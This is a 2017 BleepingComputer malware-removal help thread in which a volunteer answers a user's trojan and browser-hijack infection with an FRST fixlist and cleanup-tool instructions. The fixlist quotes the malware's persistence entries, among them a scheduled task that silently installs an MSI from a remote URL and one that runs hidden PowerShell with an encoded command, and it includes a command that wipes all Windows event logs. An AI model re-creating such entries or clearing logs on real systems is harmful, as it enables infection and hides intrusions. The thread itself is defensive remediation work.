Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Trojan and Browser Hijack Malware


  • This topic is locked This topic is locked
2 replies to this topic

#1 jabobster

jabobster

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:07:08 PM

Posted 15 March 2017 - 04:07 PM

Hello. I accidentally downloaded something earlier today and it subsequently downloaded many programs on my computer. I immediately ran a windows defender scan, and while it was running I began to uninstall these several programs. A couple google chrome extensions were installed as well, I deleted them. Windows defender found two Trojans and removed them. I thought I was fine. The previous windows defender scan was a "quick" scan, so I then began a "Full" scan. Also at around this point, my Google Chrome crashed suddenly. I reopened it and it tried to bring me to a "clickforums.ru" site but nothing would load. I couldn't load anything else either. It would just fail to load any page. I started to look on the internet on how to remove this clickforums thing but I made little progress. I had no malicious extensions and the google chrome shortcut did not have any weird website in its "target". Then, it got worse to the point where when I opened Google Chrome, It tried to go to that site or "www-searching.com" but it would sort of crash Chrome and go to a "Not Responding" situation. My windows defender scan came back with another Trojan and removed it. I left my computer for a couple hours, I came back and found a couple new programs appeared. I ran a quick windows defender scan and removed another Trojan. I uninstalled and reinstalled Chrome and had the same issue. I tried to download Zemana antimalware because I figured that Windows Defender was not sufficiently removing whatever I have. I tried to run Zemana and I got this error: "The requested resource is in use". I cannot run it. Around this time I notice a dataup.exe instance running, I looked it up and it's malware related so I felt it was worth mentioning. I tried downloading Malwarebytes and the same error appeared. I found this site and here I am. Also Windows Defender keeps telling me that it found malware and is removing it, so whatever infected my computer is still active. Pls help.

 

FRST scanned successfully. Files attached

 

 

Windows 10

Google Chrome (previously)

Mozilla Firefox (now)

Windows Defender

Attached Files


Edited by jabobster, 15 March 2017 - 04:35 PM.


BC AdBot (Login to Remove)

 


#2 JSntgRvr

JSntgRvr

    Master Surgeon General


  • Malware Response Team
  • 11,842 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto Rico
  • Local time:07:08 PM

Posted 15 March 2017 - 07:51 PM

Welcome. :)

Build a Fixlist.txt

  • Copy the entire contents of the Quote Box below to Notepad.
  • Name the file as Fixlist.txt
  • Change the Save as Type to All Files
  • and Save it in the same location FRST64 is.

Task: {033B4A3C-29CB-47B9-BF68-7DA79A260A4A} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {162EE92E-6D79-43F6-A4B1-D2C39B67EADC} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe  <==== ATTENTION
Task: {31DC7A50-FA87-4D0A-A84E-429F96F0CE54} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {3364E577-A25E-4C48-B147-D5E359D037DA} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {466C3824-B695-4E84-A298-4A88E85F28FA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {5963ABB2-FA7D-49D9-B76C-87F41B56D742} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {68A0ED75-477F-40D8-80D1-DA1EAEF6F578} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {6A0CF009-11AD-4889-B304-A53FDED040D1} - System32\Tasks\{966973AB-63AA-88E5-ABF8-149207723C54} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\54d68efc\603fa040.dll" <==== ATTENTION
Task: {6F9B85FB-67B5-431D-9DA3-8307C245B15E} - System32\Tasks\IBUpd2 => C:\Users\Jacob\AppData\Local\BrowserAir\48.0.0.0\updater.exe  <==== ATTENTION
Task: {71A1FD43-A60A-4507-88CF-F90FFF81A027} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {753E6826-C926-4647-B08C-1012A2A571B4} - System32\Tasks\SMW_UpdateTask_Time_343236383338343732392d374a55414134502a576c4a5a => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ATTENTION
Task: {8AA17A08-148D-47F0-9554-1B8E0F56EC28} - System32\Tasks\hostTask => C:\ProgramData\PrefsSecure\tree.exe [2017-03-05] () <==== ATTENTION
Task: {A12576E7-8306-492B-B800-67C1080BFBFB} - System32\Tasks\Shtigh => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=HGSTXHTS721075A9E630_JR13006R00VZDE00VZDEX&amp;v=201735 /q <==== ATTENTION
Task: {A8F0A396-7F6A-4D26-97DF-18D99522B7A6} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2017-03-05] () <==== ATTENTION
Task: {AA8D96F5-614A-4BE9-B816-F61DB4E420C7} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe  <==== ATTENTION
Task: {ABB15D00-2F06-42FA-BB73-D9E4CDEB50ED} - System32\Tasks\System Healer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE  <==== ATTENTION
Task: {B4A45595-2484-4422-BCAD-03B483E0B73C} - System32\Tasks\HDWallPaper => C:\Program Files (x86)\HDWallPaper\HDWallPaper.exe  <==== ATTENTION
Task: {BD696A3E-C4C0-43A8-9326-76F2E5E462A9} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {C27F4C2C-43FD-4F19-9E1C-1A69D34D5F13} - System32\Tasks\{0A0A0547-0B05-7D0F-7E11-0A0F7D7D1104} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAIAA7ADsAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMA (the data entry has 9492 more characters). <==== ATTENTION
Task: {C4495872-9A12-4492-A023-9D2ECB315E77} - System32\Tasks\{B7FC3992-0057-8E39-0928-A7C5507B1DEF} => C:\ProgramData\{040A2CB9-B3A1-9B12-B5DA-67CBF2C1927F}\6E282931-D983-9E9A-FF86-01EA440E0651.exe [2017-03-08] () <==== ATTENTION
Task: {C6EFB934-FDCB-439F-BEF3-A7E5D2E46037} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {D4009393-F3BD-48E6-8854-88E14C39BEDF} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {DF1FE228-09EC-4865-86D0-C3F8D3CECD7E} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe  <==== ATTENTION
Task: {F382C41A-86AB-40E1-9CB9-F1FFB9DAFFD1} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {F5FC7358-67F8-4225-928B-EB2E47648B5D} - System32\Tasks\SystemHealer Run Delay => C:\Program Files (x86)\SystemHealer\SystemHealer.exe  <==== ATTENTION
Task: C:\WINDOWS\Tasks\System HealerPeriod.job =>  <==== ATTENTION
Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
HKLM-x32\...\Run: [BestCleaner] => "C:\Program Files (x86)\BeCleaner\BestCleaner.exe" <===== ATTENTION
HKLM-x32\...\Run: [AnonymizerGadget] => "C:\Program Files (x86)\AnonymizerGadget\AnonymizerLauncher.exe" /S /startup <===== ATTENTION
HKLM-x32\...\Run: [cpx] => "C:\Program Files (x86)\cpx\cpx.exe" -starup <===== ATTENTION
HKU\S-1-5-21-187210216-2480706856-2448548973-1001\...\Run: [InterStat] => C:\Users\Jacob\AppData\Roaming\InterStat\interstat.exe [2945856 2017-03-05] (Young people) <===== ATTENTION
HKU\S-1-5-21-187210216-2480706856-2448548973-1001\...\Run: [ProxyGate] => C:\Users\Jacob\AppData\Roaming\ProxyGate\MainService.exe [1142880 2016-01-10] (Gold Click Ltd) <===== ATTENTION
GroupPolicy: Restriction - Chrome <======= ATTENTION
R2 Dataup; C:\Program Files (x86)\dataup\dataup.exe [77824 2017-01-05] () [File not signed] <==== ATTENTION
R2 qdcomsvc; C:\Program Files (x86)\qdcomsvc\qdcomsvc.exe [755712 2017-02-23] (qdcomsvc Inc.) [File not signed] <==== ATTENTION
R2 SMUpd; C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe [3110400 2017-03-05] (Search Module Ltd.) [File not signed] <==== ATTENTION
S2 TheScreenshotProService; C:\Program Files (x86)\ScreenshotPro\1.0.0.6000090\ScreenshotProServ.exe [152688 2017-01-11] () <==== ATTENTION
R2 windowsmanagementservice; C:\Users\Jacob\AppData\Local\Temp\20170305\ct.exe [724480 2017-02-22] (ct Corp.) [File not signed] <==== ATTENTION <==== ATTENTION
R1 7a0039b6a15a943a34b565aae9b126cd; C:\WINDOWS\system32\drivers\7a0039b6a15a943a34b565aae9b126cd.sys [96272 2017-02-28] (LZ58VN) <==== ATTENTION
R1 drmkpro64; C:\WINDOWS\System32\drivers\drmkpro64.sys [51784 2017-02-22] () [File not signed] <==== ATTENTION
R1 NetUtils2016; C:\WINDOWS\system32\drivers\NetUtils2016.sys [909944 2017-03-05] () <==== ATTENTION
Task: {033B4A3C-29CB-47B9-BF68-7DA79A260A4A} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {31DC7A50-FA87-4D0A-A84E-429F96F0CE54} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {3364E577-A25E-4C48-B147-D5E359D037DA} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {466C3824-B695-4E84-A298-4A88E85F28FA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {5963ABB2-FA7D-49D9-B76C-87F41B56D742} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {68A0ED75-477F-40D8-80D1-DA1EAEF6F578} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {71A1FD43-A60A-4507-88CF-F90FFF81A027} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {BD696A3E-C4C0-43A8-9326-76F2E5E462A9} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {C6EFB934-FDCB-439F-BEF3-A7E5D2E46037} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {D4009393-F3BD-48E6-8854-88E14C39BEDF} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {F382C41A-86AB-40E1-9CB9-F1FFB9DAFFD1} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Shortcut: C:\Users\Jacob\Desktop\Locker\Deep\St?rt ??r ?r?ws?r.lnk -> C:\Users\Jacob\Desktop\Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}\Deep\Browser\firefox.bat (No File)
Shortcut: C:\Users\Jacob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\St?rt ??r ?r?ws?r.lnk -> C:\Users\Jacob\Desktop\Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}\Deep\Browser\firefox.bat (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\G??gl? ?hr?m?.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.bat (No File)
AppInit_DLLs: C:\ProgramData\Voyasollam\X-tip.dll => No File
AppInit_DLLs-x32: C:\ProgramData\Voyasollam\Zoofax.dll => No File
ShortcutTarget: GeekBuddy.lnk -> C:\Program Files\COMODO\GeekBuddy\launcher.exe (No File)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\PROGRA~2\mcafee\msc\mcsniepl.dll No File
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [No File]
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [No File]
HKU\S-1-5-21-187210216-2480706856-2448548973-1001\...\Run: [XL6757WYFU] => "C:\Program Files\XCUFHKF5ZK\4GJ1GNBPT.exe"
HKU\S-1-5-21-187210216-2480706856-2448548973-1001\...\Run: [MFCU6QY9RD] => "C:\Program Files (x86)\BeCleaner\Q6DC6.exe"
HKU\S-1-5-21-187210216-2480706856-2448548973-1001\...\Run: [ProxyGate] => C:\Users\Jacob\AppData\Roaming\ProxyGate\MainService.exe [1142880 2016-01-10] (Gold Click Ltd) <===== ATTENTION
HKU\S-1-5-21-187210216-2480706856-2448548973-1001\...\Run: [L091HK7LMY] => "C:\Program Files\QUHRAQ8LYG\QUHRAQ8LY.exe"
HKU\S-1-5-21-187210216-2480706856-2448548973-1001\...\Run: [ETZ9HV0C0C] => "C:\Program Files\ID6AR8QOJW\ID6AR8QOJ.exe"
HKU\S-1-5-21-187210216-2480706856-2448548973-1001\...\Run: [OSF9TYF65H] => "C:\Program Files\1HY2RGVNO8\52N57LZTB.exe"
AppInit_DLLs: C:\ProgramData\Voyasollam\X-tip.dll => No File
AppInit_DLLs-x32: C:\ProgramData\Voyasollam\Zoofax.dll => No File
C:\Program Files\XCUFHKF5ZK
C:\Program Files (x86)\BeCleaner
C:\Users\Jacob\AppData\Roaming\ProxyGate
C:\Program Files\QUHRAQ8LYG
C:\Program Files\ID6AR8QOJW
C:\Program Files\1HY2RGVNO8
C:\ProgramData\Voyasollam
C:\Users\Jacob\AppData\Local\Temp\20170305
R2 windowsmanagementservice; C:\Users\Jacob\AppData\Local\Temp\20170305\ct.exe [724480 2017-02-22] (ct Corp.) [File not signed] <==== ATTENTION <==== ATTENTION
2017-03-07 22:31 - 2016-05-05 17:15 - 00000000 ____D C:\Users\Jacob\AppData\Local\SquirrelTemp
2017-03-03 11:16 - 2017-03-03 11:16 - 2945856 _____ (Young people) C:\Users\Jacob\AppData\Local\Temp\ASj7jDO4-prog.exe
2017-01-11 04:53 - 2017-01-11 04:53 - 0762992 _____ () C:\Users\Jacob\AppData\Local\Temp\InstallHelper.exe
2017-01-03 14:45 - 2017-01-03 14:45 - 0737856 _____ (Oracle Corporation) C:\Users\Jacob\AppData\Local\Temp\jre-8u111-windows-au.exe
2017-03-05 18:14 - 2017-03-05 18:14 - 0739904 _____ (Oracle Corporation) C:\Users\Jacob\AppData\Local\Temp\jre-8u121-windows-au.exe
2016-12-19 00:38 - 2017-03-12 21:40 - 2922496 _____ () C:\Users\Jacob\AppData\Local\Temp\SkypeSetup.exe
KLM-x32\...\Run: [svcvmx] => C:\Program Files (x86)\svcvmx\svcvmx.exe [896512 2017-01-13] ()
S2 e2d0c87328a1e589f54e96c156ffb73b; "C:\Program Files\e2d0c87328a1e589f54e96c156ffb73b\b5816d75592eb1cf5bd6487b4f491460.exe" [X]
2017-03-05 17:05 - 2017-03-05 17:05 - 7288832 _____ () C:\Users\Jacob\AppData\Roaming\agent.dat
C:\Program Files\e2d0c87328a1e589f54e96c156ffb73b
2017-03-05 17:05 - 2017-03-05 17:05 - 0070752 _____ () C:\Users\Jacob\AppData\Roaming\Config.xml
2017-03-05 17:05 - 2017-03-05 17:03 - 1120768 _____ () C:\Users\Jacob\AppData\Roaming\DongSonstring.exe
2017-03-05 17:05 - 2017-03-05 17:05 - 1892150 _____ () C:\Users\Jacob\AppData\Roaming\DongSonstring.tst
2017-03-05 17:04 - 2017-03-05 17:04 - 0016272 _____ () C:\Users\Jacob\AppData\Roaming\InstallationConfiguration.xml
2017-03-05 17:04 - 2017-03-05 17:04 - 0140288 _____ () C:\Users\Jacob\AppData\Roaming\Installer.dat
2017-03-05 17:05 - 2017-03-05 17:05 - 0018432 _____ () C:\Users\Jacob\AppData\Roaming\Main.dat
2017-03-05 17:05 - 2017-03-05 17:05 - 0005568 _____ () C:\Users\Jacob\AppData\Roaming\md.xml
2017-03-05 17:05 - 2017-03-05 17:05 - 0126464 _____ () C:\Users\Jacob\AppData\Roaming\noah.dat
2015-11-02 19:17 - 2017-03-05 14:26 - 0000093 _____ () C:\Users\Jacob\AppData\Roaming\sp_data.sys
2017-03-05 17:05 - 2017-03-05 17:05 - 0032038 _____ () C:\Users\Jacob\AppData\Roaming\uninstall_temp.ico
2017-03-05 17:05 - 2017-03-05 17:05 - 0278511 _____ () C:\Users\Jacob\AppData\Roaming\VolTax.bin
2015-12-08 23:04 - 2016-04-15 00:04 - 0000183 _____ () C:\Users\Jacob\AppData\Roaming\WB.CFG
2016-01-10 19:43 - 2016-01-10 19:43 - 0007605 _____ () C:\Users\Jacob\AppData\Local\Resmon.ResmonCfg
2017-03-05 17:04 - 2017-03-05 17:04 - 0002048 _____ () C:\Users\Jacob\AppData\Local\uninstallro.exe
2016-11-23 11:22 - 2016-11-23 11:22 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2014-09-24 08:20 - 2012-09-07 07:40 - 0000256 _____ () C:\ProgramData\SetStretch.cmd
2014-09-24 08:20 - 2009-07-22 06:04 - 0024576 _____ () C:\ProgramData\SetStretch.exe
2014-09-24 08:20 - 2012-09-07 07:37 - 0000103 _____ () C:\ProgramData\SetStretch.VBS
2017-03-05 17:04 - 2017-03-05 23:24 - 0326656 _____ () C:\ProgramData\smp2.exe
C:\ProgramData\{040A2CB9-B3A1-9B12-B5DA-67CBF2C1927F}
C:\Users\Jacob\AppData\Roaming\InterStat\interstat.exe
C:\Users\Jacob\AppData\Roaming\ProxyGate\MainService.exe
C:\ProgramData\smp2.exe
C:\Program Files (x86)\cpx
C:\Users\Jacob\AppData\Roaming\InterStat
C:\Users\Jacob\AppData\Roaming\ProxyGate
C:\Program Files (x86)\qdcomsvc
C:\Program Files\Common Files\Noobzo
C:\Program Files (x86)\ScreenshotPro
C:\WINDOWS\system32\drivers\7a0039b6a15a943a34b565aae9b126cd.sys
C:\WINDOWS\System32\drivers\drmkpro64.sys
C:\WINDOWS\system32\drivers\NetUtils2016.sys
C:\Program Files (x86)\dataup
C:\Program Files (x86)\svcvmx
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh int ip reset C:\resettcpip.txt
CMD: FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i"
CMD: Bitsadmin /Reset /Allusers
EMPTYTEMP:
Reboot:

 
Then;

  • Boot in Safe Mode.
  • Remove Screenshot Pro 1.0.0.6000090 and Search module from your programs.
  • Open FRST64 as an administrator.
  • Click on the Fix button
  • When finished, a log file Fixlog.txt will pop up and saved in the same location the tool was ran from.

Please copy and paste its contents in your next reply.
 
The computer will restart.

Please download Junkware Removal Tool to your Desktop.

  • Please close your security software to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista or 7, right-mouse click it and select Run as administrator.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete, depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your Desktop and will automatically open.
  • Please post the contents of JRT.txt into your reply.

Download AdwCleaner from here. Save the file to the desktop.


NOTE: If you are using IE 8 or above you may get a warning that stops the program from downloading. Just click on the warning and allow the download to complete.

Close all open windows and browsers.

  • XP users: Double click the AdwCleaner icon to start the program.
  • Vista/7/8 users: Right click the AdwCleaner icon on the desktop, click Run as administrator and accept the UAC prompt to run AdwCleaner.
    You will see the following console:

iO5EZayK.png

  • Click the Scan button and wait for the scan to finish.
  • After the Scan has finished the window may or may not show what it found and above, in the progress bar, you will see: Pending. Please uncheck elements you don't want to remove.
  • Click the Clean button.
  • Everything checked will be moved to Quarantine.
  • When the program has finished cleaning a report appears.Once done it will ask to reboot, allow this

adwcleaner_delete_restart.jpg

  • On reboot a log will be produced please copy / paste that in your next reply. This report is also saved to C:\AdwCleaner\AdwCleaner[S0].txt

No request for help throughout private messaging will be attended.

If I have helped you, consider making a donation to help me continue the fight against Malware!
btn_donate_SM.gif


#3 JSntgRvr

JSntgRvr

    Master Surgeon General


  • Malware Response Team
  • 11,842 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto Rico
  • Local time:07:08 PM

Posted 21 March 2017 - 04:49 PM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.

No request for help throughout private messaging will be attended.

If I have helped you, consider making a donation to help me continue the fight against Malware!
btn_donate_SM.gif





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users